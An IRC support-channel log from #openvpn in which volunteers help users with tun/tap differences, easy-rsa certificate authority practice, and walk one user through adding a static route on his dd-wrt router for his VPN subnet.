06:31 < benedikt> is there anything special i should keep in mind when i start debugging this again?
06:51 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out]
06:54 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
06:55 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
07:01 < hid3> Any ideas how to disable IPv6 in OpenVPN (server) config? Simply I don't need it.
07:02 -!- master_of_master [~master_of@p57B53D36.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
07:03 <@plaisthos> hid3: just don't enable it
07:04 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has joined #openvpn
07:05 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
07:14 < kisom> Guys, what's the difference between tap and --topology subnet?
07:14 < kisom> To me it seems like they are just about the same.
07:16 <@ecrist> not at all, aside from addressing
07:16 <@ecrist> tap is a layer 2 device, whereas tun is a layer 3 device
07:16 <@ecrist> tap passes ethernet frames, tun does not
07:24 < kisom> ecrist: So what happens to broadcasts etc to the /24 network?
07:25 <@ecrist> nothing
07:41 -!- Devastator [~devas@177.18.196.246] has joined #openvpn
07:54 -!- jforman [~jforman@unaffiliated/jforman] has left #openvpn []
08:01 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 240 seconds]
08:05 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
08:09 < WDKevin> fys, you around?
08:09 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
08:10 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
08:15 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 244 seconds]
08:16 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
08:39 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
08:49 -!- RealRancor [~Rancor3@mafiaforum.de] has quit [Read error: Connection reset by peer]
08:51 -!- Devastator [~devas@177.18.196.246] has quit [Changing host]
08:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
09:03 <@dazo> kisom: with TAP you'll get the broadcasts ... and TAP is only "topology subnet" .... but with TUN + topology subnet, you'll get a more "sane" IP setup, not spending 4 IPs for each client ... but you can only pass IP traffic (layer3) and you don't get the broadcast traffic (that's dropped) .... but should (in theory at least) be possible to get multicast traffic if needed, though
09:04 <@dazo> hid3: don't configure it (--server-ipv6) ... and it won't be used
09:04 <@dazo> but most OS today assign link-local IPv6 addresses automatically - but that's the OS kernel doing it, not OpenVPN
09:05 <@dazo> (and link-local addresses are never routed anywhere, you need global IPv6 addresses to get them routed out of your own local net)
09:45 < WDKevin> if i have my push route in the server config, do i need a pull or anything similar in the client config for it to work?
09:47 < rob0> --client includes --pull
09:47 < WDKevin> ok
09:47 < WDKevin> ive got client
09:48 < WDKevin> i need to add an iptables rule on the vpn server as well, right?
09:49 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
09:54 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
09:54 -!- AsadH is now known as zz_AsadH
09:58 < WDKevin> im able to ping the local ip of the vpn server within my network, but not any other servers on my network
09:58 < WDKevin> ive added 2 iptables rules from this page: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
09:58 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
09:58 < WDKevin> but still nothing
10:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds]
10:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds]
10:04 < rob0> !serverlan
10:04 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
10:08 < WDKevin> i have ip forwarding enabled already
10:08 < WDKevin> and i am pushing the route in my server config
10:08 < WDKevin> my local servers are all on 192.168.1.* address
10:08 < WDKevin> my push line reads:
10:09 < WDKevin> push "route 192.168.1.0 255.255.255.0"
10:09 < rob0> Did you follow through the flowchart?
10:09 < WDKevin> going through it now
10:10 < WDKevin> ok
10:10 < WDKevin> im at this step:
10:10 < WDKevin> "Add a route to the router so it knows how to reach the vpn subnet"
10:10 < WDKevin> Can you explain that a little for me?
10:13 -!- Orbi [~opera@anon-147-196.vpn.ipredator.se] has joined #openvpn
10:15 -!- raidz_away is now known as raidz
10:16 <@plaisthos> WDKevin: that is general routing and not openvpn specific
10:17 < WDKevin> would that imply that i shouldnt be able to reach my machines from within my network at home as well, then?
10:17 < havoc> I was just thinking how it'd be nice to have coordinated cooperation among channels/projects on freenode
10:17 < havoc> e.g. "Go to ##networking, and ask about 'routing
10:17 < havoc> e.g. "Go to ##networking, and ask about 'routing', then come back here"
10:18 < WDKevin> plaisthos, or does that mean since my vpn's are all on 10.0.8.* ip's that i need to tell my router about them?
10:18 < WDKevin> vpn clients*
10:18 < rob0> havoc, I don't think IRC could ever possibly substitute for knowing the basics.
10:19 < havoc> rob0: I agree, I was just thinking that #networking would be a better place to start
10:19 <@plaisthos> WDKevin: from your question I think you should read about basic routing
10:19 < havoc> i.e. learn your requirements first
10:19 < WDKevin> fair enough
10:19 -!- Orbi [~opera@anon-147-196.vpn.ipredator.se] has quit [Ping timeout: 248 seconds]
10:19 < WDKevin> we all have to start somewhere
10:19 < havoc> WDKevin: oh, I'm not criticizing you, or anyone, I'm trying to come up with a solution
10:19 <@plaisthos> I want to sound harsh but without a general understanding of how routing works this will be hard to explain
10:20 < WDKevin> i understand
10:20 < WDKevin> i mean i understand what you're saying
10:20 < havoc> plaisthos, rob0: sometimes you have to ask at least once before you can know that there is more to know
10:20 <@dazo> !tcpip
10:20 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
10:20 < havoc> "What do I need to know/learn to do this?"
10:21 <@plaisthos> dazo: yeah that one ;)
10:21 < havoc> of course people on both sides of the issue would have to be patient enough for it to work
10:22 < havoc> WDKevin: basically you need/want to know IPv4 "routing", and its requirements
10:22 < WDKevin> ok
10:22 < WDKevin> ill look into it
10:22 <@dazo> WDKevin: not sure you saw that URL (!tcpip) ... but you'll save a lot of frustration by going through chapter 3.1 and trying to understand that
10:22 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn
10:22 < WDKevin> though i still have the same router configs as the last time i had openvpn working, just a few months ago
10:23 <@dazo> WDKevin: nothing stops working out-of-the-blue .... if it worked then but not now ... believe it or not ... something did change
10:23 < WDKevin> im not arguing that
10:23 < WDKevin> i shutdown the standalone server and virtualized it
10:23 < WDKevin> reset up openvpn with different auth settings
10:24 <@dazo> then you definitely need to get a grasp of network routing .... and then learn to use tcpdump to see where the traffic goes in reality ... and figure out why it does so and then you can change it properly
10:37 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
10:37 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn
10:41 -!- zz_AsadH is now known as AsadH
10:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:50 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 276 seconds]
10:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection]
11:00 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn
11:04 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
11:10 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds]
11:24 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
11:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 256 seconds]
11:41 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:54 -!- nickanderson_afk is now known as nickanderson
11:58 < Devastator> pekster I've made a step by step of how I would handle certs/keys, you are probably going to laugh even without wine, but if you wanna take a look anyway, ping me
11:58 -!- AsadH is now known as zz_AsadH
12:01 -!- ade_b [~Ade@host-78-65-176-101.homerun.telia.com] has joined #openvpn
12:01 -!- ade_b [~Ade@host-78-65-176-101.homerun.telia.com] has quit [Changing host]
12:01 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
12:10 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye]
12:12 -!- pikaro [~vinter@pD9E607D1.dip.t-dialin.net] has joined #openvpn
12:17 -!- BtbN [~btbn@btbn.de] has joined #openvpn
12:18 < pikaro> hi! i've got a problem here. got a vpn account for work today, and started a vpn session. being the idiot that I am, I closed the window containing my password. my vpn session is still running, though. is there any way at all to retrieve the password from it? I've got full root access to the computer I'm on, running Debian unstable. The hash would likely suffice, it was just 8 characters.
12:18 <@dazo> Devastator: I'm interested in that topic as well ... so if you dare show it to me, I can surely review it for you
12:18 <@dazo> pikaro: nope, no chance
12:19 < pikaro> FUCK. I'm screwed, goodbye deadline.
12:19 <@dazo> pikaro: you could of course start a gdb session on the running openvpn instance, unless the openvpn config uses --auth-nocache
12:19 < pikaro> thanks anyways
12:19 <@dazo> but digging through the memory segments where it could be stored will take so much time and render openvpn useless during that time it will disconnect
12:20 < pikaro> it does not
12:21 <@dazo> pikaro: you need debug packages installed ... and you need gdb ... a lot of patience and gdb skills ... and with that there's a low chance you'll be able to dig up the info
12:21 -!- nze [~user@unaffiliated/nze] has joined #openvpn
12:21 < pikaro> would it be stored in clear text? I still remember the first character and the last three...
12:22 <@dazo> pikaro: my recommendation ... work as hell as long as the tunnel is available ... and get the password tomorrow
12:22 < Devastator> dazo, sure, excuse my english: http://codepad.org/n0OKFcMM
12:22 <@vpnHelper> Title: Plain Text code - 12 lines - codepad (at codepad.org)
12:23 <@dazo> pikaro: it will most likely be in clear text
12:23 < Devastator> just don't laugh too loud :P
12:24 <@dazo> Devastator: in fact, you're doing the right thing for a paranoid setup! /me likes step #2, #3 and #4
12:24 < nze> i'm trying to set up openvpn on a centos 5.9 vps; when i try to start openvpn, i get a complaint about /dev/net/tun missing. so i tried to insmod tun, but /lib/modules is empty. how can i see if the kernel was compiled with support for loading modules dynamically?
12:24 < pikaro> alright then :( still screwed, though... thanks anyways!
12:25 < nze> and how do i check which modules have been compiled into the kernel statically?
12:25 <@dazo> Devastator: be careful with the clean-all and build-ca steps .... those should only be done one time. And whenever you need to create a new server or client cert on the same CA, you just do the build-key-server or build-key-client, plus the copy stuff
12:26 <@dazo> Devastator: you only need dh{n}.pem on the server side, though
12:26 < nze> [not 100% this is the right place for these questions, but fundamentally i want to use openvpn; it just seems to require the tun module]
12:26 <@dazo> Devastator: and build-key-{server,client} will do the sign-req stuff for you ... no need to do that twice :)
12:26 <@dazo> Devastator: except for that ... good job!
12:27 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:27 <@dazo> Devastator: I started this wiki page a long time ago ... haven't had time to clean it up and finalise it ... but here's some more background on this topic: https://community.openvpn.net/openvpn/wiki/How_does_PKI_work
12:27 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net)
12:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
12:28 <@plaisthos> dazo: the client ignores it if not compiled with CLIENT_ONLY :)
12:28 < Devastator> dazo ok, because yesterday I was told to generate csr instead of already signed cert/key, but I thought just like you, as I'm doing in an "offline" site
12:28 <@dazo> nze: I guess your VPS is openVZ or something like that? .... if so, you need to ask your VPS provider to enable the tun device for you
12:29 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
12:29 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
12:29 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
12:29 -!- mode/#openvpn [+o krzee] by ChanServ
12:29 < Devastator> dazo should this "another computer" be out of internet just to be extra cautious?
12:29 <@dazo> Devastator: well, the gen csr stuff makes sense if the client does the key generation and sends just the CSR file to the CA ... then the CA can validate the CSR info, and provide a CRT if it decided to sign the CSR
12:30 <@dazo> Devastator: if your CA is completely off-line, that is surely the best step ... as the CA is the most sacred files you'll ever have in your hands
12:30 <@dazo> especially the ca.key
12:30 < Devastator> understood!
12:30 <@dazo> plaisthos: the client ignores what when?
12:30 <@dazo> Devastator++ :)
12:30 < Devastator> well, I guess I will be running my vpn tomorrow then
12:31 <@dazo> :)
12:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Client Quit]
12:31 < Devastator> less than I expected heheh
12:31 <@dazo> Devastator: CA stuff sounds hefty and heavy and complicated ... but in fact, if you just understand the small pieces and how they interact, managing a CA isn't that hard :)
12:32 < Devastator> when you say "send the CSR to the CA", you mean copy the CSR to the CA site, correct?
12:32 <@dazo> correct
12:33 < Devastator> because every time I read the word send, I think of a tool which would send it over the lan/internet, but I guess this is not the case
12:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
12:33 <@dazo> The client can do a ./build-req ... which makes only the client.key + client.csr .... send the client.csr to CA and get a client.crt back
12:34 < Devastator> correct
12:34 <@plaisthos> dazo: the client only ignores a dh xxx.pem option if it is compiled without the CLIENT_ONLY option, otherwise it bites you for not knowing --dh
12:34 <@dazo> the CSR contains the public key of the client + certificate subject info (Common Name, etc, etc) ... and the CA will then, with ./sign-req, display this info and ask you: Is this information correct? ... and if yes, it signs the CSR with its CA key
12:35 < Devastator> I'm so relieved right now, I have been studying this for 2 days
12:36 <@dazo> plaisthos: the DH params aren't loaded on clients ... they shouldn't be at least ... that's just a big prime used for the DH key exchange, and will be transferred over the wire to the client no matter
12:36 <@dazo> (dhparam isn'
12:36 <@dazo> isn't a secret either)
12:36 < walp> dazo: so it doesn't need to be specified in the client conf at all?
12:36 <@dazo> nope
12:36 <@dazo> only server
12:37 < walp> cool
12:37 < Devastator> dazo can client.conf be shared no problem? of course, changing crt and key
12:37 <@dazo> Devastator: yes, it can
12:38 < Devastator> great! I'm all set I guess heheh
12:38 <@dazo> Devastator: congrats :)
12:38 < walp> "Who is this Diffie guy, and why is he in my mayonnaise?"
12:39 <@dazo> plaisthos: if you don't believe me ... look at init_ssl() in ssl.c ... and then look for tls_ctx_load_dh_params() ;-)
12:39 < Devastator> dazo if you find my steps useful, I can improve it cosmetically speaking, for a howto or so
12:40 <@dazo> Devastator: putting a bit more words to those steps and cleaning it up would definitely make sense ... and you can add them to the community.openvpn.net wiki if you want to
12:41 -!- pikaro [~vinter@pD9E607D1.dip.t-dialin.net] has quit [Quit: Leaving]
12:45 < Devastator> dazo sure! it's nice to give something back
12:45 <@dazo> Devastator++ :)
13:03 -!- socomm [~socomm@96-40-128-63.dhcp.mtpk.ca.charter.com] has joined #openvpn
13:03 -!- socomm [~socomm@96-40-128-63.dhcp.mtpk.ca.charter.com] has left #openvpn ["WeeChat 0.3.7"]
13:03 -!- scampbell [~scampbell@mail.scampbell.net] has joined #openvpn
13:14 -!- zz_AsadH is now known as AsadH
13:18 < pekster> Devastator: It's fine to use an offline CA like that, but the "truly paranoid" (you'll have to decide if you fall into this category) try not to let private keys touch another system since that increases the chances they can be recovered (compromise of any place the private key is opens up the door to a brute-force attack
13:19 < Devastator> pekster another system includes a live distro?
13:20 < pekster> I don't really like the idea of generating a server key on a USB stick either (easy-rsa doesn't encrypt the server key with a passphrase, so you're literally storing the raw bytes on your USB stick.) Flash is much harder to "erase properly" due to wear-leveling. If you simply "rm -rf /usb/*" the data is usually trivial to recover; a full wipe may work against most attackers, although flash does things like wear leveling that "could" make f
13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
13:20 < pekster> Simple rule for the paranoid: never generate private keys where they aren't used
13:21 <@krzee> unless using embedded devices!
13:21 < pekster> I don't see the point of generating the server key on anything except the server. But that means you need to "stage" a duplicate easy-rsa setup (in terms of setting and sourcing vars) and run build-req on that box, then bring in the .csr
13:21 * krzee holds up djb's router
13:21 < pekster> krzee: Yes, of course :)
13:21 < Devastator> ok, I'll redo with minor changes for you to comment again
13:22 < pekster> If you're going to use an offline CA, you might as well not pollute things by dropping your unencrypted key on (traditionally hard to erase/secure later) flash media
13:22 < pekster> That's just shooting yourself in the foot if you ever lose that USB stick (and the thief wants to attack you. Temper my paranoia levels to suit your needs, of course)
13:23 < Devastator> your paranoia makes sense imho
13:23 < pekster> General process works like this: set up CA on an offline environment (you have this now.) Keep the physical storage secure, and never plug it into an online system. Also use a strong passphrase for the CA key
13:24 <@dazo> pekster: you would probably cat the file on the terminal ... and type it into the other (destination) terminal?
13:24 <@dazo> or would that make it risky in regards to telepathy?
13:24 <@dazo> ;-)
13:24 < pekster> Why would I need to copy anything over by terminal? :P
13:25 * pekster generates keys on target systems using them, and certs/csr's are not private
13:25 < pekster> You can send your csr/crt by email, walkie-talkie, ham radio, or take out an advert in the Super Bowl for all I care :)
13:25 * dazo is just trying to make fun of pekster :-P
13:25 <@dazo> yeah, agreed :)
13:26 < pekster> I once exchanged GPG fingerprints with a buddy over ham radio :)
13:26 <@dazo> geek!
13:26 < Devastator> hahaha
13:26 < pekster> It was more convenient at the time than some silly challenge/response thing in email
13:27 <@dazo> uhm ... phone? ;-)
13:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:29 < pekster> Ironically, ham radio was probably "faster" (transmission wise) since it goes the speed of light, not subject to brief delays in the telco's system ;)
13:29 < pekster> Anyway...
13:29 <@dazo> :)
13:30 * dazo wonders if WinstonSmith is a George Orwell fan .....
13:31 < pekster> Devastator: It's actually fairly easy to generate keys on your server/clients: each one just has their own easy-rsa setup. You make sure vars has matching values. server/clients don't need to do any build-ca or build-dh stuff: just build-req (for the server: that'll be *unencrypted* since it can't type a pass on startup) and build-key-pass (for clients where you normally do want keys encrypted for protection)
13:31 <@dazo> pekster: if you read the scrollback ;-)
13:31 < pekster> dazo: Yea. That has some stuff about .key files going onto USB
13:32 < pekster> key generation on the target avoids that
13:35 <@dazo> pekster: yeah, I know ... but we discussed the build-req stuff :)
13:36 <@dazo> [19:35] the CSR contains the public key of the client + certificate subject info (Common Name, etc, etc) ... and the CA will then, with ./sign-req, display this info and ask you: Is this information correct? ... and if yes, it signs the CSR with its CA key
13:37 <@dazo> sorry ... wrong paste
13:37 <@dazo> [19:33] The client can do a ./build-req ... which makes only the client.key + client.csr .... send the client.csr to CA and get a client.crt back
13:38 < pekster> Ah, k. nvm then. So long as "vars" match and the $KEY_DIR is created (clean-all once on each host does that) yea, that'll do it
13:45 <@dazo> pekster: why does ./vars need to match?
13:45 < pekster> openssl.cnf as used by easy-rsa is configured to reject a mismatch of some X509 fields
13:45 <@ecrist> yeah
13:46 <@ecrist> it's irritating, imho
13:46 < pekster> One can patch openssl.cnf of course, but then you probably aren't using easy-rsa if you have that level of skill :P
13:46 <@ecrist> I wish I knew who could fix that.
13:46 < pekster> I can
13:46 <@dazo> hmmm ... interesting
13:46 <@ecrist> pekster: I was being funny
13:46 < pekster> Maybe I'll even give you an 'svn diff' patch this time ;)
13:46 <@ecrist> that'd be sweet
13:46 < WDKevin> ive done some reading up on the routing as i was instructed to do earlier, and while it seems a little confusing, i think i get the basics of it.
13:46 <@ecrist> or, create a github account and submit a pull request
13:47 < WDKevin> now if i could just figure out how to get the vpn client to see the rest of the network based on what i read
13:48 <@dazo> WDKevin: look into tcpdump ... 'tcpdump -ni tun0' ... and on another terminal 'tcpdump -ni eth0' .... (change tun0/eth0 to the devices you expect)
13:48 <@dazo> and then from one place, start a ping to a host you want to reach .... then you can see with tcpdump where the pings and pongs go
13:48 <@dazo> and then you'll probably get a hint where to start looking
13:49 < WDKevin> ok, just did that
13:49 <@dazo> further
13:49 < WDKevin> im at work, vpn'd in and ssh'd into the openvpn server
13:49 < pekster> ecrist: Another option is to just do away with all the silly options in the cert to begin with. Unless keeping company/city/state/etc was really wanted. I design all my VPN certs with nothing but a CN
13:49 < WDKevin> when i ping a different server on the network, i can see it in the tcpdump, it going to that ip
13:50 <@ecrist> pekster: if you want to get involved with easy-rsa, we should talk
13:50 <@ecrist> there's a lot of "silly" in there I want to do away with.
13:50 < WDKevin> dazo, should i see 2 entries for each ping or just one?
13:51 < WDKevin> just a forward from the vpn ip to the destination ip im pinging?
13:51 <@dazo> but do you get more than just ICMP ECHO request ... you should see both ICMP echo request and then following an ICMP echo reply message
13:51 < WDKevin> nevermind that
13:51 <@dazo> 20:51:06.017622 IP 10.35.7.2 > 172.16.33.20: ICMP echo request, id 31541, seq 1, length 64
13:51 <@dazo> 20:51:06.082056 IP 172.16.33.20 > 10.35.7.2: ICMP echo reply, id 31541, seq 1, length 64
13:51 < WDKevin> yes, when i ping the vpn server, i get that
13:51 < WDKevin> a request and a reply
13:51 < WDKevin> when i ping another server on the network i only see the request, no reply
13:52 <@dazo> okay ... that means that your VPN server is the first place to look
13:52 <@dazo> you do the tcpdump on the VPN server?
13:52 < WDKevin> yup
13:52 <@krzee> i will guess:
13:52 <@krzee> !route_outside_ovpn
13:52 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
13:52 <@dazo> okay ... then there are two things to check .... a) ip_forwarding enabled? b) firewalling?
13:52 < WDKevin> krzee, that is also what someone else suggested this morning
13:53 <@krzee> ip forwarding is enabled because he got to the servers eth0
13:53 < WDKevin> thats what i was told to read up on routing
13:53 < WDKevin> yes, ip forwarding is enabled
13:53 < WDKevin> and you are correct, the vpn server is not the gateway for the LAN
13:53 <@krzee> im generally pretty good at diagnosing these ;]
13:53 <@dazo> WDKevin: then you need to add a route on either your default gateway ... or the server you try to reach
13:54 <@krzee> ^ yep
13:54 < WDKevin> i think the guys had figured it out this morning too, but i was instructed to do some learning before i could get more help
13:54 <@dazo> which points your VPN IP network to your OpenVPN server
13:54 < pekster> ecrist: Sure. I'm only half-here now (listening to nasa's press release on DA14) but I can PM you or join the dev channel as appropriate. Exchange goals or a wishlist or something
13:54 < WDKevin> i would like to do it on the gateway so i can reach all my servers on the lan
13:54 <@dazo> WDKevin++
13:54 <@krzee> if you want learning:
13:54 <@krzee> !route
13:54 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
13:54 < WDKevin> the gateway is my router, which is running dd-wrt
13:54 <@krzee> the section "routes behind openvpn" talks about this
13:54 <@krzee> errr "routes outside openvpn"
13:55 <@krzee> you have 1 easy route to add to that router
13:56 < WDKevin> looking at my dd-wrt web interface, im in the setup -> advanced routing -> static routing
13:56 <@dazo> that's the right place!
13:56 < WDKevin> would i add a route here with the destination lan net set to my vpn gateway, the subnet is 255.255.255.0 and the gateway is my lan's gateway (192.168.1.1)?
13:57 <@dazo> no
13:57 <@krzee> WDKevin, thought you wanted to learn
13:57 < WDKevin> doh
13:57 -!- joshie_ [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has joined #openvpn
13:57 < WDKevin> krzee, im reading the article you linked
13:57 <@krzee> i gave you links to a diagram and explanation
13:57 <@krzee> :D
13:57 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn
13:57 * WDKevin slaps himself
13:57 <@dazo> you need to route the VPN network via the VPN server ...
13:58 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 256 seconds]
13:58 <@krzee> http://www.secure-computing.net/wiki/index.php/Graph might be easy to understand (i hope it is)
13:58 <@vpnHelper> Title: Graph - Secure Computing Wiki (at www.secure-computing.net)
13:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
13:58 < WDKevin> krzee, looking that over again
14:01 < WDKevin> i think im getting confused because these diagrams are using 10. ip's for everything
14:02 < WDKevin> and my LAN is all on 192.
14:02 < WDKevin> just making it harder for me to get it all straight
14:02 <@dazo> WDKevin: right now, you don't need to care about LAN
14:02 < WDKevin> ok
14:02 <@dazo> WDKevin: what you need to care about ... is that your dd-wrt router gets packets destined towards your VPN
14:02 <@dazo> and you need to tell dd-wrt to route those packets via your OpenVPN server
14:02 < WDKevin> alright
14:03 < WDKevin> so can we agree the subnet is at least 255.255.255.0?
14:03 <@krzee> only lan ip involved is the vpn server's lan ip
14:03 <@dazo> WDKevin: is that the subnet of your VPN?
14:03 < WDKevin> it is
14:03 <@dazo> then that is the correct subnet
14:03 <@krzee> WDKevin, if your --server statement uses 255.255.255.0
14:03 < WDKevin> it does
14:03 < WDKevin> its server 10.8.0.0 255.255.255.0
14:03 <@krzee> thats the subnet you're adding a route to
14:03 <@krzee> and the gateway is the vpn server's lan ip
14:03 <@dazo> so called, destination net
14:04 * dazo is not giving the obvious and quick answer deliberately ... just so you'll understand it (and hopefully) remember it better
14:04 < WDKevin> i know this
14:04 < WDKevin> i prefer it
14:05 < WDKevin> and i certainly appreciate it!
14:05 <@dazo> :)
14:05 <@dazo> WDKevin++ for that attitude!
14:05 < WDKevin> so the gateway would be 10.8.0.0
14:05 <@dazo> no
14:05 < WDKevin> gah
14:05 <@krzee> did the "routes outside openvpn" section of !route help?
14:06 < WDKevin> krzee, i think it half helped, and half confused me more
14:06 < WDKevin> lol
14:06 <@dazo> WDKevin: did you understand what the gateway needs to be now?
14:06 < WDKevin> http://www.secure-computing.net/wiki/index.php/Graph
14:06 <@vpnHelper> Title: Graph - Secure Computing Wiki (at www.secure-computing.net)
14:06 <@dazo> the gateway is the box on your network who knows how to forward a subnet
14:06 < WDKevin> when i look at that graph, the gateway looks like my router
14:06 <@dazo> a specific subnet
14:06 <@krzee> WDKevin, you'll notice i didnt use common subnets, because you shouldnt use common subnets when routing lans over openvpn
14:07 <@krzee> the gateway in my graph is .10 on its lan
14:07 <@dazo> WDKevin: in the graph image .... replace 10.10.2 .... with 192.168.1 for example (or whatever your lan has)
14:07 < WDKevin> my lan is 192.168.1.1 as the gateway
14:07 <@dazo> and your VPN server?
14:07 < WDKevin> 10.8.0.0 14:07 <@krzee> you are sharing too common of a subnet over your vpn 14:07 <@dazo> WDKevin: your VPN server have two IP addresses 14:08 <@krzee> you may have problems when a client connects from 192.168.1.x (very very common) 14:08 <@dazo> one for the VPN ... and one for the eth0 14:08 < WDKevin> ah, ok 14:08 < WDKevin> tun0 is 10.8.0.1 14:08 < WDKevin> eth0 is 192.168.1.101 14:08 <@dazo> WDKevin: and 10.8.0.0 is the VPN subnet address 14:08 <@dazo> correct! 14:09 <@dazo> so now ... lets try to build up a route command ... shall we? All the information is here ... three variables 14:09 < WDKevin> lets do it 14:09 < WDKevin> the 3 fields i have in dd-wrt are destination lan net 14:09 <@dazo> subnet address (10.8.0.0) ... subnet mask (255.255.255.0) and your VPN server's eth0 addresss 14:09 < WDKevin> ok 14:09 < WDKevin> subnet is obvious 14:09 <@krzee> WDKevin, is 192.168.1.101 from dhcp? 14:09 < WDKevin> no 14:10 <@krzee> good 14:10 < WDKevin> static ips everywhere 14:10 < WDKevin> i promise im not as dumb as i look right now 14:10 < WDKevin> which admittedly is very dumb 14:10 <@dazo> you have the correct answer most likely right under your nose :) 14:10 <@krzee> well its likely in the dhcp pool still, but ill leave that for when you have problems with it lol 14:10 <@dazo> hehe 14:11 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 256 seconds] 14:11 <@dazo> krzee: don't distract is train of thoughts now ;-) 14:11 <@dazo> s/is/his/ 14:11 < WDKevin> krzee, ive limited the pool down to 200+ 14:11 <@dazo> WDKevin: so your routing parameters ... have you figured them out by now? 14:12 < WDKevin> the gateway is 10.8.0.1? 14:12 <@dazo> no 14:12 < WDKevin> then its the eth0 ip? 14:12 <@dazo> you want to tell the dd-wrt router to route your VPN subnet via your VPN server (which got the IP 192.168.1.101) 14:13 < WDKevin> so the gateway is 192.168.1.101 14:13 <@dazo> correct! 
14:13 < WDKevin> now before i try to guess the destination net lan, what does that even mean?
14:13 < WDKevin> that label sounds wonky
14:14 < WDKevin> or is that where the 10.8.0.1 goes?
14:14 <@dazo> it is very obvious if you just think about it .... the dd-wrt gets a packet destined for example 10.8.0.3 .... now where should it route it?
14:14 <@dazo> it looks into the routing table
14:15 < WDKevin> so it is the tun0 ip?
14:15 < WDKevin> or no wait
14:15 < WDKevin> no it has to be
14:15 < WDKevin> right?
14:15 <@dazo> it finds which subnet 10.8.0.3 matches into ... the subnet mask 255.255.255.0 tells it that the destination subnet 10.8.0.0 has the valid range of 10.8.0.0->10.8.0.255 .... so 10.8.0.3 matches here
14:16 <@dazo> and it looks at the gateway field and finds 192.168.1.101 .... and sends the packet to that box
14:16 <@dazo> WDKevin: 10.8.0.1 on the VPN server is for the VPN clients to have a gateway
14:16 < WDKevin> ah, ok
